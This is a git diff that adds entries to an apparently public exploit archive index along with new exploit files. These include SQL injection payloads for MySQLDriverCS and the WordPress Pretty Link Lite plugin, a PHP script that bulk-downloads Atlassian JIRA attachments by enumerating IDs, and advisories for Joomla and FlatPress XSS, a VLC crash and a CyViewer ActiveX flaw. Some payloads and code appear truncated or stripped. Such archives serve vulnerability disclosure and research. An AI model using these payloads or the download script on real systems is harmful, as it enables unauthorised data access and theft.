diff --git a/files.csv b/files.csv
index 091dd870b..721b1243f 100755
--- a/files.csv
+++ b/files.csv
@@ -32327,3 +32327,10 @@ id,file,description,date,author,platform,type,port
35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
+35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
+35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0
+35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0
+35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0
+35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
+35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
+35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
diff --git a/platforms/multiple/remote/35892.txt b/platforms/multiple/remote/35892.txt
new file mode 100755
index 000000000..ffa97dcd4
--- /dev/null
+++ b/platforms/multiple/remote/35892.txt
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/48466/info
+
+MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.
+
+There is an example for illustrating the attack against the vulnerability:
+----------------------------------------------------------------------
+DataTable dt = new DataTable();
+MySQLConnection conn = new MySQLConnection(CONN_STRING);
+MySQLDataAdapter Cmd = new MySQLDataAdapter();
+string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
+Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
+Cmd.SelectCommand.Connection.Open();
+Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
+Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
+Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
+Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
+Cmd.Fill(dt);
+Cmd.SelectCommand.Connection.Close();
+----------------------------------------------------------------------
+
+Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
+----------------------------------------------------------------------
+@sFileName: " or 1=1 -- -"
+@sLanguage: "cn@sFileName"
+----------------------------------------------------------------------
+
+Then, the final sql query statement executed by Mysql is as following:
+----------------------------------------------------------------------
+SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
+----------------------------------------------------------------------
+Of course, we should use two parameters to launch a cross-parameter SQL injection attack.
diff --git a/platforms/multiple/remote/35898.php b/platforms/multiple/remote/35898.php
new file mode 100755
index 000000000..4939747e0
--- /dev/null
+++ b/platforms/multiple/remote/35898.php
@@ -0,0 +1,72 @@
+source: http://www.securityfocus.com/bid/48484/info
+
+Atlassian JIRA is prone to a security bypass vulnerability.
+
+An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application.
+
+= $argv[3])
+{
+echo "\n\n#The second number must be bigger than the first one\n";
+die;
+}
+
+$numero = $argv[2];
+
+for ($numero;$numero <= $argv[3];$numero++)
+{
+$head = get_headers("$url$numero/");
+
+if (substr ($head[0],9,3) == "404")
+{
+echo "\n#File number $numero not found! (404)\n";
+}
+else{
+$explodeo = explode("filename*=",$head[2]);
+$explodeo2 = explode(";",$explodeo[1]);
+$archivo = substr($explodeo2[0],7);
+
+echo "\n#Downloading file: $archivo\n";
+$file=file_get_contents("$url$numero/$archivo");
+file_put_contents($archivo,$file);
+
+}
+}
+echo "\n#All attachment downloaded correctly!\n";
+die;
+
+?>
+
diff --git a/platforms/php/webapps/35893.txt b/platforms/php/webapps/35893.txt
new file mode 100755
index 000000000..781a04c5c
--- /dev/null
+++ b/platforms/php/webapps/35893.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/48469/info
+
+The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Pretty Link Lite 1.4.56 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
+select @@version
+http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
+select @@version
+http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
+select @@version
\ No newline at end of file
diff --git a/platforms/php/webapps/35894.txt b/platforms/php/webapps/35894.txt
new file mode 100755
index 000000000..8ac350ae6
--- /dev/null
+++ b/platforms/php/webapps/35894.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/48471/info
+
+Joomla! CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Joomla! CMS versions 1.6.3 and prior are vulnerable.
+
+http://www.example.com/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";>
+http://www.example.com/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=>
+http://www.example.com/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
+http://www.example.com/joomla163_noseo/index.php?option=";>&task=reset.request
\ No newline at end of file
diff --git a/platforms/php/webapps/35896.txt b/platforms/php/webapps/35896.txt
new file mode 100755
index 000000000..bcab304c6
--- /dev/null
+++ b/platforms/php/webapps/35896.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/48482/info
+
+FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+FlatPress 0.1010.1 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/windows/local/35902.txt b/platforms/windows/local/35902.txt
new file mode 100755
index 000000000..b22ea1547
--- /dev/null
+++ b/platforms/windows/local/35902.txt
@@ -0,0 +1,29 @@
+Title : VLC Player 2.1.5 Write Access Violation Vulnerability
+Discoverer: Veysel HATAS (@muh4f1z)
+Web page : www.binarysniper.net
+Vendor : VideoLAN VLC Project
+Test: Windows XP SP3
+Status: Fixed
+Severity : High
+
+CVE ID : CVE-2014-9598
+
+NIST: ?https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
+OSVDB ID : 116451
+VLC Ticket : 13390
+
+windbglog : windbglog.txt
+
+
+Discovered : 24 November 2014
+Reported : 26 December 2014
+Published : 9 January 2015
+
+Description : VLC Media Player contains a flaw that is triggered as
+user-supplied input is not properly sanitized when handling a specially crafted
+M2V file . This may allow a
+context-dependent attacker to corrupt memory and potentially execute
+arbitrary code.
+
+## EDB Mirror: http://www.exploit-db.com/spolits/35902-poc.m2v
+## EDB Mirror: http://www.exploit-db.com/spolits/35902-windbglog.txt
\ No newline at end of file
diff --git a/platforms/windows/remote/35897.html b/platforms/windows/remote/35897.html
new file mode 100755
index 000000000..e90e13af4
--- /dev/null
+++ b/platforms/windows/remote/35897.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/48483/info
+
+CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
+
+Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
+
+
+
+
+
+
\ No newline at end of file